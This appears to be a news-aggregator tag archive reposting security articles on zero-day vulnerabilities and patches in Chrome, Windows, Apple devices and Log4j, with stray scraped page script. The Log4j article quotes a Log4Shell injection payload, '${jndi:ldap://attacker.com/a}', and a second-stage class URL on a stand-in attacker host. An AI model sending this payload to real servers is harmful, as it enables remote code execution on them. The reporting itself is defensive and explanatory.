Tag Archives: zeroday

Technology

Windows Users Urged To Update As Microsoft Confirms New Zero-Day Exploits – Forbes

July 13, 2023 Admin Leave a comment

Windows Users Urged To Update As Microsoft Confirms New Zero-Day Exploits Forbes
Microsoft Patch Tuesday Fixes 132 Vulnerabilities, Addresses 6 Zero-Days ExtremeTech
CISA gives US civilian agencies until August 1 to resolve four Microsoft vulnerabilities The Record from Recorded Future News
Indian Computer Emergency Response Team (CERT-In) issues warning of critical vulnerability in Microsoft products, posing security risk OnMSFT.com
Microsoft’s latest Patch Tuesday addresses 6 actively exploited zero-day vulnerabilities TechSpot
View Full Coverage on Google News

Read original article here

Technology

Update Chrome now to patch actively exploited zero-day

August 17, 2022 Admin Leave a comment

Enlarge / It’s a good time to restart or update Chrome—if your tabs love you, they’ll come back.

Getty Images

Google announced an update on Wednesday to the Stable channel of its Chrome browser that includes a fix for an exploit that exists in the wild.

CVE-2022-2856 is a fix for “insufficient validation of untrusted input in Intents,” according to Google’s advisory. Intents are typically a way to pass data from inside Chrome to another application, such as the share button on Chrome’s address bar. As noted by the Dark Reading blog, input validation is a common weakness in code.

The exploit was reported by Ashley Shen and Christian Resell of the Google Threat Analysis Group, and that’s all the information we have for now. Details of the exploit are currently tucked behind a wall in the Chromium bugs group and are restricted to those actively working on related components and registered with Chromium. After a certain percentage of users have applied the relevant updates, those details may be revealed.

Google says the update—104.0.5112.101 for Mac and Linux and 104.0.5112.102/101 for Windows—will “roll out over the coming days/weeks,” but you can (and should) manually update Chrome now (check the “About” section of your settings).

There are 10 other security fixes included in the update. Dark Reading notes that this is Chrome’s fifth zero-day vulnerability disclosed in 2022.

Listing image by Getty Images

Read original article here

Technology

Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout

July 13, 2022 Admin Leave a comment

Microsoft released its monthly round of Patch Tuesday updates to address 84 new security flaws spanning multiple product categories, counting a zero-day vulnerability that’s under active attack in the wild.

Of the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are two other bugs in the Chromium-based Edge browser, one of which plugs another zero-day flaw that Google disclosed as being actively exploited in real-world attacks.

Top of the list of this month’s updates is CVE-2022-22047 (CVSS score: 7.8), a case of privilege escalation in the Windows Client Server Runtime Subsystem (CSRSS) that could be abused by an attacker to gain SYSTEM permissions.

“With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools,” Kev Breen, director of cyber threat research at Immersive Labs, told The Hacker News. “With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly.”

Very little is known about the nature and scale of the attacks other than an “Exploitation Detected” assessment from Microsoft. The company’s Threat Intelligence Center (MSTIC) and Security Response Center (MSRC) have been credited with reporting the flaw.

Besides CVE-2022-22047, two more elevation of privilege flaws have been fixed in the same component — CVE-2022-22026 (CVSS score: 8.8) and CVE-2022-22049 (CVSS score: 7.8) — that were reported by Google Project Zero researcher Sergei Glazunov.

“A locally authenticated attacker could send specially crafted data to the local CSRSS service to elevate their privileges from AppContainer to SYSTEM,” Microsoft said in an advisory for CVE-2022-22026.

“Because the AppContainer environment is considered a defensible security boundary, any process that is able to bypass the boundary is considered a change in Scope. The attacker could then execute code or access resources at a higher integrity level than that of the AppContainer execution environment.”

Also remediated by Microsoft include a number of remote code execution bugs in Windows Network File System (CVE-2022-22029 and CVE-2022-22039), Windows Graphics (CVE-2022-30221), Remote Procedure Call Runtime (CVE-2022-22038), and Windows Shell (CVE-2022-30222).

The update further stands out for patching as many as 32 issues in the Azure Site Recovery business continuity service. Two of these flaws are related to remote code execution and the remaining 30 concern privilege escalation.

“Successful exploitation […] requires an attacker to compromise admin credentials to one of the VMs associated with the configuration server,” the company said, adding the flaws do not “allow disclosure of any confidential information, but could allow an attacker to modify data that could result in the service being unavailable.”

On top of that, Microsoft’s July update also contains fixes for four privilege escalation vulnerabilities in the Windows Print Spooler module (CVE-2022-22022, CVE-2022-22041, CVE-2022-30206, and CVE-2022-30226) after a brief respite in June 2022, underscoring what appears to be a never-ending stream of flaws plaguing the technology.

Rounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service (CVE-2022-30216) and Microsoft Defender for Endpoint (CVE-2022-33637) and three denial-of-service (DoS) flaws in Internet Information Services (CVE-2022-22025 and CVE-2022-22040) and Security Account Manager (CVE-2022-30208).

Software Patches from Other Vendors

In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

'+n+'...

'+a+"...

"}s+="",document.getElementById("result").innerHTML=s}}),t=!0)})}); //]]>

Read original article here

Technology

Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild

July 5, 2022 Admin Leave a comment

Google on Monday shipped security updates to address a high-severity zero-day vulnerability in its Chrome web browser that it said is being exploited in the wild.

The shortcoming, tracked as CVE-2022-2294, relates to a heap overflow flaw in the WebRTC component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.

Heap buffer overflows, also referred to as heap overrun or heap smashing, occur when data is overwritten in the heap area of the memory, leading to arbitrary code execution or a denial-of-service (DoS) condition.

“Heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker’s code,” MITRE explains. “When the consequence is arbitrary code execution, this can often be used to subvert any other security service.”

Credited with discovering and reporting the flaw on July 1, 2022, is Jan Vojtesek from the Avast Threat Intelligence team. It’s worth pointing out that the bug also impacts the Android version of Chrome.

As is usually the case with zero-day exploitation, details pertaining to the flaw as well as other specifics related to the campaign have been withheld to prevent further abuse in the wild and until a significant chunk of users are updated with a fix.

CVE-2022-2294 also marks the resolution of the fourth zero-day vulnerability in Chrome since the start of the year –

Users are recommended to update to version 103.0.5060.114 for Windows, macOS, and Linux and 103.0.5060.71 for Android to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

'+n+'...

'+a+"...

"}s+="",document.getElementById("result").innerHTML=s}}),t=!0)})}); //]]>

Read original article here

Technology

Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability

March 26, 2022 Admin Leave a comment

Google on Friday shipped an out-of-band security update to address a high severity vulnerability in its Chrome browser that it said is being actively exploited in the wild.

Tracked as CVE-2022-1096, the zero-day flaw relates to a type confusion vulnerability in the V8 JavaScript engine. An anonymous researcher has been credited with reporting the bug on March 23, 2022.

Type confusion errors, which arise when a resource (e.g., a variable or an object) is accessed using a type that’s incompatible to what was originally initialized, could have serious consequences in languages that are not memory safe like C and C++, enabling a malicious actor to perform out-of-bounds memory access.

“When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution,” MITRE’s Common Weakness Enumeration (CWE) explains.

The tech giant acknowledged it’s “aware that an exploit for CVE-2022-1096 exists in the wild,” but stopped short of sharing additional specifics so as to prevent further exploitation and until a majority of users are updated with a fix.

CVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year, the first being CVE-2022-0609, a use-after-free vulnerability in the Animation component that was patched on February 14, 2022.

Earlier this week, Google’s Threat Analysis Group (TAG) disclosed details of a twin campaign staged by North Korean nation-state groups that weaponized the flaw to strike U.S. based organizations spanning news media, IT, cryptocurrency, and fintech industries.

Google Chrome users are highly recommended to update to the latest version 99.0.4844.84 for Windows, Mac, and Linux to mitigate any potential threats. Users of Chromium-based browsers such as Microsoft Edge, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

'+n+'...

'+a+"...

"}s+="",document.getElementById("result").innerHTML=s}}),t=!0)})}); //]]>

Read original article here

Technology

Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild

December 14, 2021 Admin Leave a comment

Google has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the 17th such weakness to be disclosed since the start of the year.

Tracked as CVE-2021-4102, the flaw relates to a use-after-free bug in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw.

As it stands, it’s not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, “it’s aware of reports that an exploit for CVE-2021-4102 exists in the wild.” This is done so in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors.

CVE-2021-4102 is the second use-after-free vulnerability in V8 the company has remediated in less than three months following reports of active exploitation, with the previous vulnerability CVE-2021-37975, also reported by an anonymous researcher, plugged in an update it shipped on September 30. It’s not immediately clear if the two flaws bear any relation to one another.

With this latest update, Google has addressed a record 17 zero-days in Chrome this year alone —

Chrome users are recommended to update to the latest version (96.0.4664.110) for Windows, Mac, and Linux by heading to Settings > Help > ‘About Google Chrome’ to mitigate any potential risk of active exploitation.

'+n+'...

'+a+"...

"}s+="",document.getElementById("result").innerHTML=s}}),t=!0)})}); //]]>

Read original article here

Technology

Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit

December 10, 2021 Admin Leave a comment

A critical vulnerability has been discovered in Apache Log4j 2, an open-source Java package used to enable logging in many popular applications, and it can be exploited to enable remote code execution on countless servers.

The Apache Software Foundation (ASF) has identified the vulnerability as CVE-2021-44228; LunaSec has dubbed it Log4Shell. (And security researcher Kevin Beaumont was kind enough to create a logo for it, too.) ASF says Log4Shell receives the maximum severity rating, 10, on the Common Vulnerability Scoring System (CVSS) scale.

Tweet

LunaSec offers a step-by-step breakdown of how Log4Shell can be exploited on vulnerable servers:

Data from the User gets sent to the server (via any protocol),
The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via “Java Naming and Directory Interface” (JNDI),
This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

Researchers say they found evidence that Log4Shell can be exploited in servers operated by Apple, Cloudflare, Twitter, Valve, Tencent, and other large companies. The vulnerability is said to be particularly easy to exploit in Minecraft servers, too, with some proof-of-concept attacks using nothing more than the in-game chat.

Tweet

A Cloudflare spokeperson says there is “no evidence of exploitation of us.” In a blog post, Cloudflare said it “uses some Java-based software and our teams worked to ensure that our systems were not vulnerable or that this vulnerability was mitigated. In parallel, we rolled out firewall rules to protect our customers.” It also deployed protection to free customers “because of the vulnerability’s severity.”

Log4j version 2.15.0 has been released to address this flaw, but The Record reports that its fix merely changes a setting from “false” to “true” by default. Users who change the setting back to “false” remain vulnerable to attack. Luckily, this means that servers running earlier versions of Log4j can mitigate the attack by changing that setting.

ASF says that “this behavior can be mitigated by setting system property ‘log4j2.formatMsgNoLookups’ to ‘true’ or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)” in earlier versions of Log4j if users can’t upgrade to the 2.15.0 release.

Recommended by Our Editors

The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom’s CERT, the Greynoise security firm, and others have all reported that attackers are actively looking for servers vulnerable to Log4Shell attacks. These efforts will continue—and expand—so addressing the vulnerability as soon as possible is critical.

Editors’ Note: This story was updated with comment from Cloudflare.

Security Watch newsletter for our top privacy and security stories delivered right to your inbox.”,”first_published_at”:”2021-09-30T21:22:09.000000Z”,”published_at”:”2021-09-30T21:22:09.000000Z”,”last_published_at”:”2021-09-30T21:22:03.000000Z”,”created_at”:null,”updated_at”:”2021-09-30T21:22:09.000000Z”})” x-show=”showEmailSignUp()” class=”rounded bg-gray-lightest text-center md:px-32 md:py-8 p-4 font-brand mt-8 container-xs”>

Like What You’re Reading?

This newsletter may contain advertising, deals, or affiliate links. Subscribing to a newsletter indicates your consent to our Terms of Use and Privacy Policy. You may unsubscribe from the newsletters at any time.

function facebookPixelScript() { if (!facebookPixelLoaded) { facebookPixelLoaded = true; document.removeEventListener('scroll', facebookPixelScript); document.removeEventListener('mousemove', facebookPixelScript);

!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','//connect.facebook.net/en_US/fbevents.js');

fbq('init', '454758778052139'); fbq('track', "PageView"); } }

Read original article here

Technology

Apple Releases Urgent iPhone and iPad Updates to Patch New Zero-Day Vulnerability

October 12, 2021 Admin Leave a comment

Apple on Monday released a security update for iOS and iPad to address a critical vulnerability that it says is being exploited in the wild, making it the 17th zero-day flaw the company has addressed in its products since the start of the year.’

The weakness, assigned the identifier CVE-2021-30883, concerns a memory corruption issue in the “IOMobileFrameBuffer” component that could allow an application to execute arbitrary code with kernel privileges. Crediting an anonymous researcher for reporting the vulnerability, Apple said it’s “aware of a report that this issue may have been actively exploited.”

Technical specifics about the flaw and the nature of the attacks remain unavailable as yet, as is the identity of the threat actor, so as to allow a majority of the users to apply the patch and prevent other adversaries from weaponizing the vulnerability. The iPhone maker said it addressed the issue with improved memory handling.

Security researcher Saar Amar shared additional details, and a proof-of-concept (PoC) exploit, noting that “this attack surface is highly interesting because it’s accessible from the app sandbox (so it’s great for jailbreaks) and many other processes, making it a good candidate for LPEs exploits in chains.”

CVE-2021-30883 is also the second zero-day impacting IOMobileFrameBuffer after Apple addressed a similar, anonymously reported memory corruption issue (CVE-2021-30807) in July 2021, raising the possibility that the two flaws could be related. With the latest fix, the company has resolved a record 17 zero-days to date in 2021 alone —

CVE-2021-1782 (Kernel) – A malicious application may be able to elevate privileges
CVE-2021-1870 (WebKit) – A remote attacker may be able to cause arbitrary code execution
CVE-2021-1871 (WebKit) – A remote attacker may be able to cause arbitrary code execution
CVE-2021-1879 (WebKit) – Processing maliciously crafted web content may lead to universal cross-site scripting
CVE-2021-30657 (System Preferences) – A malicious application may bypass Gatekeeper checks
CVE-2021-30661 (WebKit Storage) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30663 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30665 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30666 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30713 (TCC framework) – A malicious application may be able to bypass Privacy preferences
CVE-2021-30761 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30762 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30807 (IOMobileFrameBuffer) – An application may be able to execute arbitrary code with kernel privileges
CVE-2021-30858 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30860 (CoreGraphics) – Processing a maliciously crafted PDF may lead to arbitrary code execution
CVE-2021-30869 (XNU) – A malicious application may be able to execute arbitrary code with kernel privileges

Apple iPhone and iPad users are highly recommended to update to the latest version (iOS 15.0.2 and iPad 15.0.2) to mitigate the security vulnerability.

'+n+'...

'+a+"...

"}s+="",document.getElementById("result").innerHTML=s}}),t=!0)})}); //]]>

Read original article here

Technology

Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws

October 1, 2021 Admin Leave a comment

Google on Thursday pushed urgent security fixes for its Chrome browser, including a pair of new security weaknesses that the company said are being exploited in the wild, making them the fourth and fifth actively zero-days plugged this month alone.

The issues, designated as CVE-2021-37975 and CVE-2021-37976, are part of a total of four patches, and concern a use-after-free flaw in V8 JavaScript and WebAssembly engine as well as an information leak in core.

As is usually the case, the tech giant has refrained from sharing any additional details regarding how these zero-day vulnerabilities were used in attacks until a majority of users are updated with the patches, but noted that it’s aware that “exploits for CVE-2021-37975 and CVE-2021-37976 exist in the wild.”

An anonymous researcher has been credited with reporting CVE-2021-37975. The discovery of CVE-2021-37976, on the other hand, involves Clément Lecigne from Google Threat Analysis Group, who was also credited with CVE-2021-37973, another actively exploited use-after-free vulnerability in Chrome’s Portals API that was reported last week, raising the possibility that the two flaws may have been stringed together as part of an exploit chain to execute arbitrary code.

With the latest update, Google has addressed a record 14 zero-days in the web browser since the start of the year.

Chrome users are advised to update to the latest version (94.0.4606.71) for Windows, Mac, and Linux by heading to Settings > Help > ‘About Google Chrome’ to mitigate any potential risk of active exploitation.

'+n+'...

'+a+"...

"}s+="",document.getElementById("result").innerHTML=s}}),t=!0)})}); //]]>

Read original article here

Technology

Attackers Exploiting Windows Zero-Day Flaw – Krebs on Security

September 8, 2021 Admin Leave a comment

Microsoft Corp. warns that attackers are exploiting a previously unknown vulnerability in Windows 10 and many Windows Server versions to seize control over PCs when users open a malicious document or visit a booby-trapped website. There is currently no official patch for the flaw, but Microsoft has released recommendations for mitigating the threat.

According to a security advisory from Redmond, the security hole CVE-2021-40444 affects the “MSHTML” component of Internet Explorer (IE) on Windows 10 and many Windows Server versions. IE been slowly abandoned for more recent Windows browsers like Edge, but the same vulnerable component also is used by Microsoft Office applications for rendering web-based content.

“An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,” Microsoft wrote. “The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”

Microsoft has not yet released a patch for CVE-2021-40444, but says users can mitigate the threat from this flaw by disabling the installation of all ActiveX controls in IE. Microsoft says the vulnerability is currently being used in targeted attacks, although its advisory credits three different entities with reporting the flaw.

On of the researchers credited — EXPMON — said on Twitter that it had reproduced the attack on the latest Office 2019 / Office 365 on Windows 10.

“The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous),” EXPMON tweeted.

Windows users could see an official fix for the bug as soon as September 14, when Microsoft is slated to release its monthly “Patch Tuesday” bundle of security updates.

This year has been a tough one for Windows users and so-called “zero day” threats, which refers to vulnerabilities that are not patched by current versions of the software in question, and are being actively exploited to break into vulnerable computers.

Virtually every month in 2021 so far, Microsoft has been forced to respond to zero-day threats targeting huge swaths of its user base. In fact, by my count May was the only month so far this year that Microsoft didn’t release a patch to fix at least one zero-day attack in Windows or supported software.

Many of those zero-days involve older Microsoft technologies or those that have been retired, like IE11; Microsoft officially retired support for Microsoft Office 365 apps and services on IE11 last month. In July, Microsoft rushed out a fix for the Print Nightmare vulnerability that was present in every supported version of Windows, only to see the patch cause problems for a number of Windows users.

On June’s Patch Tuesday, Microsoft addressed six zero-day security holes. And of course in March, hundreds of thousands of organizations running Microsoft Exchange email servers found those systems compromised with backdoors thanks to four zero-day flaws in Exchange.

Read original article here

HeadlinesCurator

Tag Archives: zeroday

Windows Users Urged To Update As Microsoft Confirms New Zero-Day Exploits – Forbes

Update Chrome now to patch actively exploited zero-day

Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout

Software Patches from Other Vendors

Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild

Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability

Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild

Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit

Recommended by Our Editors

Like What You’re Reading?

Apple Releases Urgent iPhone and iPad Updates to Patch New Zero-Day Vulnerability

Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws

Attackers Exploiting Windows Zero-Day Flaw – Krebs on Security

The Ultimate News Site